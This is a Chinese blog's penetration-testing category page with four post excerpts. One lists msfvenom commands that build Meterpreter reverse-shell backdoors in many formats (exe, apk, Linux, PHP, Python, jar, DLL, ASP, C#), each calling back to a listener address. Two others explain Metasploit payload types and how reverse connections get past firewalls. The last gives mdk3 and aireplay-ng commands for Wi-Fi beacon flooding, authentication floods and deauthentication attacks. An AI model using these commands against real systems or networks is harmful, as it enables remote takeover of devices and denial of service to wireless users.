首页
关于
README
Search
1
mdk3工具使用
156 阅读
2
Windows11pro 下载体验
122 阅读
3
关于C语言
120 阅读
4
关于Docker容器--0×01
119 阅读
5
关于本站
99 阅读
默认分类
网络技术
渗透测试
编程语言
C语言
Python
Linux
搞机技巧
Termux
golang
Search
标签搜索
printf
Toanle
累计撰写
24
篇文章
累计收到
78
条评论
首页
栏目
默认分类
网络技术
渗透测试
编程语言
C语言
Python
Linux
搞机技巧
Termux
golang
页面
关于
README
搜索到
4
篇与
渗透测试
的结果
2021-06-09
关于使用msfvenom生成各类木马后门
免责声明:如果您不确定自己在做什么,请不要尝试在本文中使用任何内容。在windows系统下:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f exe > abc.exe 在安卓下:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=5555 R> apk.apk在Linux下:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 R > /root/Desktop/toanle注意:需要把toanle加权限 chmod +x ./test 在C语言里:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f c > shellcode.c在php:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f raw > shell.php在python里:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f raw > shell.py在java里;msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 W > text.jar在DLL里msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -a x86 -f dll > shell.dll 在asp或者aspx里:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f asp > shell.asp 在C#里:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f csharp > shellcode.txt
2021年06月09日
12 阅读
0 评论
0 点赞
2021-04-27
Metasploit使用指南2
0*00通过之前的学习,我们大致了解了一下metasploit现在我们进入msf学习show exploits显示漏洞利用模块目前自带约2122个show auxiliary显示辅助模块,一般是扫描、拒绝服务、Fuzz测试show payloads显示当前模块支持的载荷
2021年04月27日
38 阅读
0 评论
0 点赞
2021-04-21
metasploit-framework使用指南
注意非合法网络安全人员请离开,谢谢本篇教材仅供参考学习,请勿用于犯罪行为。0*001认识Metasploit Framework是一个编写,测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。使用Metasploit安全测试工具在渗透测试中可以做很多事情,你可以保存你的日志、甚至定义每个有效负载在运行完成之后是如何将其自身清除的。值得一提的是这个强大的工具是免费的。基础了解msfupdate用于更新Metasploit服务。msfconsoleShell终端下进入Metasploit模式Stager中几种常见的payload windows/meterpreter/bind_tcp #正向连接windows/meterpreter/reverse_tcp #反向连接,常用windows/meterpreter/reverse_http #通过监听80端口反向连接windows/meterpreter/reverse_https #通过监听443端口反向连接正向连接使用场景:我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,被攻击机上开了防火墙,只允许访问指定的端口,比如被攻击机只对外开放了80端口。那么,我们就只能设置正向连接80端口了,这里很有可能失败,因为80端口上的流量太多了反向连接使用场景:我们的主机和被攻击机都是在外网或者都是在内网,这样被攻击机就能主动连接到我们的主机了。如果是这样的情况,建议使用反向连接,因为反向连接的话,即使被攻击机开了防火墙也没事,防火墙只是阻止进入被攻击机的流量,而不会阻止被攻击机主动向外连接的流量。反向连接80和443端口使用场景:被攻击机能主动连接到我们的主机,还有就是被攻击机的防火墙设置的特别严格,就连被攻击机访问外部网络的流量也进行了严格的限制,只允许被攻击机的80端口或443端口与外部通信
2021年04月21日
24 阅读
0 评论
0 点赞
2021-03-07
mdk3工具使用
“ MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试、WIDS干扰等功能”。0x00 前期准备系统环境:Kali Linux将网卡设置为监听模式 airmon-ng start wlan00x01 beacon泛洪攻击可以伪造大量apmdk3 mon0 b -n 单个ssid -c 信道 -s 200 -amdk3 mon0 b -n 单个ssid -w(wep加密) -c 信道 -s 200mdk3 mon0 b -f 文件名 ssid -a -h -c 信道 -s 2000x02 DOS攻击mdk3 网卡 a -a 路由mac -s 攻击速率针对mac地址进行洪水攻击,直到目标无响应0x03 强制解除验证解除连接mdk3 网卡 d -c 信道这样会把使用所有这个信道的路由器的人,全部踹下网或者也可以使用aircrack-ng套件aireplay-ng -0 数量 -a APmac -c 客户端mac 网卡mdk3 wlan b -f bai.txt -c 6 -s 1000 解析:-c 向6 这个频道发送每秒广播1000个数据包 -f 这个参数 是用自己编辑好的文档内容作为SSID去广播不过这个只是针对一个路由器现在mdk3已经停止维护了,官方推出了mdk4了:GitHub地址:https://github.com/aircrack-ng/mdk4That’s all.{mtitle}END{/mtitle}
2021年03月07日
156 阅读
0 评论
0 点赞